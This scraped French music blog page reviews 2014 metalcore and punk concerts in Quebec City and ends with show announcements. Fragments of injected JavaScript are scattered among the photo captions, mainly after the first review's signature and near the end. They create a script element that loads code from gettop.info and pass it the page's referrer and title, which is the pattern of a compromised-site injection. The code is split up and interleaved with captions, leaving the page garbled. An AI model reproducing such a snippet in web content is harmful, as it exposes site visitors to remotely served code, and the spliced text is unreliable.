The Family Ruin : Le band était à sa première visite dans la ville de Québec et il a su faire une très bonne première impression. C’est donc avec un retard d’environs trente minutes que le groupe est entré sur scène. Même si le groupe n’est pas encore très connu par ici, il a eu droit à une excellente réaction de la foule, qui a même eu l’air de les avoir surpris. Le groupe avait une très bonne prestance sur scène et côté musical, le groupe n’a absolument rien à envier aux autres groupes de leur genre. Une setlist courte, mais assez longue pour nous donner le goût d’aller écouter leurs compositions et d’apprendre à les connaitre. Une belle découverte pour beaucoup de gens présents.

 

Chelsea Grin : Voici maintenant venu le temps du deuxième groupe à se présenter sur scène. Eux aussi ont eu droit à un accueil plus que chaleureux. Petit changement de style par rapport à The Family Ruin, car Chelsea Grin offre un son plus death core, mais malgré tout, la sonorité du groupe venait se marier très bien au thème de la tournée Moving On Tour. La foule fût plus énergique qu’au groupe qui les précédait. Il y a eu beaucoup plus de mushpit et d’agitations au parterre, ce qui a donné un petit boost de plus à la foule. Encore une setlist un peu courte, environs la même durée que The Family Ruin, mais en prenant en considération le nombre de groupes invités pour cette tournée, ceci reste très acceptable.

 

Blessthefall : Beaucoup de fans présents étaient là pour Blessthefall malgré le fait que c’est Asking Alexandria qui est à la tête de la tournée. La foule à totalement disjonctée à l’arrivée du band. Beau Bokan, le chanteur du groupe, était totalement en forme et ça se voyait. Il se promenait partout sur scène, était toujours en mouvement. Il est même allé à quelques reprises sur la barricade, au plus grand plaisir des fans. Il interagissait beaucoup avec la foule. Il a même parlé de la beauté de la ville de Québec et a promis qu’il reviendrait dès que possible. Durant leurs chansons Déjà Vu, Beau à même invité ceux, pour qui s’était leur première fois qu’ils voyaient Blessthefall, à venir lui faire un high five, et ce, en body surfing. Mission un peu dure à accomplir, car la sécurité repoussait les gens. Bokan a également demandé à la foule de faire deux circles pit en même temps, et aussi un wall of death peu de temps après la chanson Bottomfeeder. Ils ont interprétés leurs hits tels que ; You Wear a Crown But You’re No King, What’s Left of Me, Déjà Vu, See You on the Outside et Hollow Bodies. Le drummer du groupe Chelsea Grin est même venu, comme par surprise, compléter la chanson The Reign, avec le reste du groupe. Après une performance plus qu’excellente, c’est maintenant au tour du groupe principal à faire son entré.

 

Asking Alexandria : Après une petite intro musicale assurée par The Final Countown, le band fait son entrée sur scène avec Don’t Pray for Me. Déjà dès le début, nous pouvions remarquer une forte puissance des jeux de lumières que les techniciens avaient préparés. Après quelques morceaux, on peut déjà constater que les musiciens sont bien présents, actifs et rendent un son impeccable… mais il en est toutefois autre chose pour Danny Worsnop, le chanteur du groupe. En effet, Danny n’avait aucune prestance sur scène, statique devant son micro, ne bougeait pas plus qu’il ne le faut et paraissait même un peu pompette. Il manquait tellement d’énergie que durant le spectacle, il s’est couché par terre en disant à la foule : Shut Up, I’m taking a nap. Également, Danny ne réussissait pas à atteindre les hautes notes, nous pouvions presque croire qu’il faisait des vocalises. Les autres membres du groupe ont tentés, tant bien que de mal, de corriger le tout, mais rendu à ce point, le mal était déjà fait. À mon avis c’est un peu décevant pour les fans du groupe, mais malgré tout, ils ont eu l’air d’avoir appréciés le spectacle offert. Le band a joué des titres comme; Moving on, The death of Me, Killing you, Poison, A prophecy, The Final Episode et j’en passe. Certains titres joués étaient différents des versions enregistrées en studio. Soit le tempo ou la vitesse de la chanson était modifié, ou même l’intégralité même de la chanson l’était parfois, ce qui menait certaines confusions pour les fans. Même si Danny n’interagissait pas beaucoup, quand il le faisait, il le faisait avec un brin d’humour, ce qui aidait parfois à oublier son manque de prestance et son air de gars fini. Malgré les petites lacunes rencontrées, se fut quand même un bon moment pour terminer une soirée bien arrosée d’une dose de Metalcore.

 

En conclusion, se fût une excellente soirée de Metalcore, qui a surement rassasiée les fans présents qui en demande toujours plus, car ce style de musique ne se présente que très rarement à Québec. D’excellentes découvertes pour ceux qui ne connaissaient pas les groupes invités, un Blessthefall, qui a volé la vedette, si on en croit certains fans présents, et un groupe principal qui offre une bonne prestation, malgré un chanteur qui aurait pu être plus présent pour ses fans et être dans un meilleur état. Sur ce, je vous salue et je vous invite à revenir sur ultimradio.com pour plus de critiques, de photos et de nouvelles sur vos spectacles préférés.

See Ya !

Christopher Drouins.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Asking Alexandria Impérial de Québec 2014

if (document.currentScript) {

Photo: Blessthefall

Photo: Chelsea Grin

} else {

Photo: THE FAMILY RUIN IMpérial de Québec 2014

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

Photo: Swiggin’ Utters

if (document.currentScript) {

Photo: Lagwagon Impérial 2014

}

Critique de Lagwagon, Swingin’ Utters et This Legend à l’Impérial de Québec – 1er décembre 2014

Le 1er décembre 2014: une date dont plusieurs se souviendront. Hier, à l’Impérial de Québec, tout un événement avait lieu. Plusieurs gens étaient fébriles depuis des jours à l’idée d’assister à cette soirée. Je ne faisais pas exception à la règle. Dans une salle bondée de monde et même sold-out si je ne m’abuse, qu’avait lieu le lancement de l’album Hang de Lagwagon en sol québécois. Pour ouvrir la soirée, Swingin’ Utters, un band légendaire ainsi que This Legend, réchauffaient la salle pour la cerise sur le sundae de la fin. Un autre show magnifique d’une belle brochette de bands californiens signé Get A Room.

 

Comme je l’ai mentionné plus haut, le premier band à commencer cette belle soirée est les excellents This Legend. Tout droit sorti de la magnifique ville de Los Angeles en Californie, le quartet pop-punk est formé de deux ex-membres de Yellowcard, soit Longineu Parsons et Ben Harper, ainsi que de Steven Neufeld (ex-membre de Craig’s Brother) et de Chris Castillo. Le groupe nouvellement crée en début d’année a sorti leur premier album It’s In The Streets au début novembre. Si vous ne l’avez pas acheté au spectacle hier, vous pouvez streamer l’album sur ce site: http://www.redbull.com/us/en/music/stories/1331689438333/this-legend-album-premiere-it-s-in-the-streets. J’avais écouté le streaming du disque avant de me présenter au show donc, j’avais une petite idée de ce qui m’attendait, mais pas à ce point-là. J’ai été totalement séduite par eux. Un pop-punk comme je l’aime comprenant quatre musiciens plein de talents. Le drummer LP m’a impressionné. N’écoutant pas de Yellowcard dans ma vie, je ne l’avais jamais vu à l’oeuvre. Hier, il a captivé mon regard une bonne partie du set. Rien d’impressionnant musicalement; ils ne réinventent pas la roue non plus, mais tout de même une formation très intéressante qui gagnera à être connue selon moi. Par la suite, les légendes Swingin’ Utters ont pris place sur la scène. Le groupe punk rock de Californie n’est pas né d’hier. En effet, vingt-sept années plus tôt, soit en 1987, le groupe a débuté leur longue histoire musicale jusqu’à leur arrêt en 2003. Sept ans plus tard, ils ont décidé de se reformer pour poursuivre leur beau travail et pondre un petit nouveau récemment. En effet, la formation a fait naître un nouvel album du nom de Fistful of Hollow (2014) en novembre dernier. Ce disque s’ajoute à leur nombreux déjà existants dont, Poorly Formed (2013), Here, Under Protest (2011), Dead Flowers, Bottles, Bluegrass and Bones (2003), Swingin’ Utters (2000), Five Lessons Learned (1998), A Juvenile Product of The Working Class (1996) et The Streets of San Francisco (1995). À tout cela s’ajoute également plusieurs EPs, albums live, compilations, singles, splits et certaines de leurs chansons ont fait leur apparition dans des jeux vidéos ainsi que des films. Bref, un band qui a exploré plusieurs avenues possibles pour faire entendre leurs créations punk rock. L’album qui les aurait projeté à une plus grande échelle serait The Streets of San Francisco, qui a été reconnu comme un chef-d’oeuvre dans le « street-punk ». Cela les a problablement aidé, par la suite, a être approché par le label de Fat Wreck Chords pour ensuite y être signé en 1996. Bref, une très courte histoire pour un groupe qui a presque trente ans d’existence. Hier, au spectacle, la foule qui connaît moins le groupe a forcément pu reconnaître certains classiques de leur adolescence soit, entre autres, Five Lessons Learned, Fifteenth And T et Jackie Jab. Étant pas très bonne dans l’association des chansons avec leurs titres, je vais m’en tenir à ces trois-là que je suis certaine. Malgré le fait que la formation existe depuis des années, c’était définitivement dans une ambiance tranquille qu’ils ont aligné plusieurs des chansons de leur set, avec une foule réceptive, mais surtout dans l’attente de la tête d’affiche Lagwagon. Parlons EN-FIN Lagwagon. Juste avant de parler de la prestation, je vais faire un bref historique de la formation de punk rapide active depuis 1989. Avec les années, ils ont su se démarquer avec leurs albums pour se tailler une place de choix dans la scène punk et même devenir parmi les groupe les plus influents au monde. Leur nouvel album, Hang, extrêmement attendu par les fans de la formation depuis presque dix années, s’est enfin montré le nez en novembre dernier. Ça a fait l’effet d’une bombe sur la planète; tout le monde en parlait. Hang est tout de même différent des plus récents albums, avec des tonalités plus lourdes, dans un style plus rock mélodique avec certains riffs plus lourds. Malgré tout, il se fait énormément apprécier par la population en générale. Mission accomplie pour Lagwagon qui n’avait rien sorti depuis Resolve en 2005. Six autres albums complets font partis du tableau de chefs-d’oeuvre du groupe, tous étant en bonne partie des disques ayant influencé notre jeunesse, soit Blaze (2003), Let’s Talk About Feelings (1998), Double Plaidinum (1997), Hoss (1995), Trashed (1994) et Duh (1992) qui les a engagé sur le label de Fat Wreck Chords. Pour ce qui est du spectacle d’hier, en toute franchise, je ne savais pas trop à quoi m’attendre. Bien sûre que je savais que le show allait être bon, pour ça, j’avais aucun doute là-dessus. Ma crainte pour moi c’était le set. J’avais peur que trop de chansons du nouvel album soit incluses dedans, pas qu’il est mauvais, mais que je suis juste en train de commencer à apprécier leur son un peu différent depuis mes minimums quinze écoutes. Finalement, après les avoir compté (oui oui, je les ai vraiment compté jusqu’à ce que je perde le pari que j’avais fait avec un ami sur le nombre de chansons de Hang jouées), ils ont joué six chansons minimum. Malgré tout, le côté « live » de ces nouvelles pièces ne m’a pas laissé indifférente. En réalité, j’ai tout de même apprécié. Bref, les membres étaient en pleine forme et ils ont donné un spectacle à la hauteur des attentes de leurs fans, je crois, du moins, à la hauteur des miennes. Une seule déception, les *!#?& clôtures, aka comment enlever l’ambiance plaisante d’un show. Sinon c’était juste du beau. Ça bougeait à l’Impérial pis ça chantait fort, un show comme on les aime.

 

http://thislegend.com/

http://swinginutters.com/

http://lagwagon.com/} else {

Photo: Feels like Home

var d=document;var s=d.createElement(‘script’);

Photo: Within The Ruins

if (document.currentScript) {

Lagwagon à Québec en décembre

Pour ceux et celles qui ne vivez pas sur la même planète que nous, Lagwagon débarque en ville le 1e décembre 2014 à l »impérial de Québec.

Procurez-vous vos billets chez EXO, n’attendez pas que se soir complet pour vous réveiller !!!

Production Get A Room, www.getaroom.ca

lag_11x17_zps330eb4b9

Nightwish à Québec en avril………….. C’est Sold Out !

Et oui !!! Qui aurais pu crois le contraire? Sûrement pas moi, Nightwish avec Floor Jansen, c’était sur que le Capitole allait se remplir sans aucun problème. Si problème il y a maintenant, c’est que le spectacle affiche COMPLET! Une bonne nouvelle pour les amateurs de Metal Symphonique comme moi.

Une production District 7 https://www.facebook.com/district7prod?fref=photo

Première partie, Sabaton et Delain

 

10404443_583055268462045_4308940978685983755_n